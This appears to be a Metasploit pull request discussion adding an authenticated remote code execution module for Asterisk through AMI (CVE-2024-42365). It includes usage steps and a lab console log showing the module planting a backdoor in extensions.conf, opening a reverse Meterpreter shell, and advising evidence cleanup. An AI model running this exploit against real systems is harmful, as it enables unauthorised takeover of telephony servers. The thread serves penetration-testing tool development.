Asterisk authenticated rce via AMI (CVE-2024-42365)

[h00die]

Fixes #19388

Authenticated RCE for Asterisk via AMI for users with originate access, CVE-2024-42365. Hats off to @bcoles for writing a bunch of the underlying functionality which I'm going to move into a lib. Exploit works with certain payloads, needs a cleanup and some more robustness.

• [ ] Install the application
• [ ] Start msfconsole
• [ ] Do: use exploit/linux/misc/asterisk_ami_originate_auth_rce
• [ ] Do: set rhosts <rhost>
• [ ] Do: set lhost <lhost>
• [ ] Do: set username <username>
• [ ] Do: set password <password>
• [ ] You should get a shell.

[h00die]

Everything else should be addressed!

[h00die]

Just tested w/ all changes, still working just fine :)

[jheysel-r7]

Thanks for making those changes! I also just retested and everything was working perfectly :) Landing now

msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set rhost 192.168.123.243
rhost => 192.168.123.243
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set username testuser
username => testuser
msf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > set password testuser
password => testuser
rmsf6 exploit(linux/misc/asterisk_ami_originate_auth_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.243:5038 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[+] 192.168.123.243:5038 - Authenticated successfully
[!] 192.168.123.243:5038 - The service is running, but could not be validated. Able to connect, unable to determine version
[*] 192.168.123.243:5038 - Found Asterisk Call Manager version 8.0.2
[+] 192.168.123.243:5038 - Authenticated successfully
[*] 192.168.123.243:5038 - Using new context name: MiCAmsEvkFU
[*] 192.168.123.243:5038 - Loading conf file
[*] 192.168.123.243:5038 - Setting backdoor
[*] 192.168.123.243:5038 - Reloading config
[*] 192.168.123.243:5038 - Triggering shellcode
[*] Sending stage (24772 bytes) to 192.168.123.243
[+] 192.168.123.243:5038 - !!!Don't forget to clean evidence from /etc/asterisk/extensions.conf!!!
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.243:49454) at 2024-11-29 09:19:54 -0800

meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer        : freepbx.sangoma.local
OS              : Linux 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit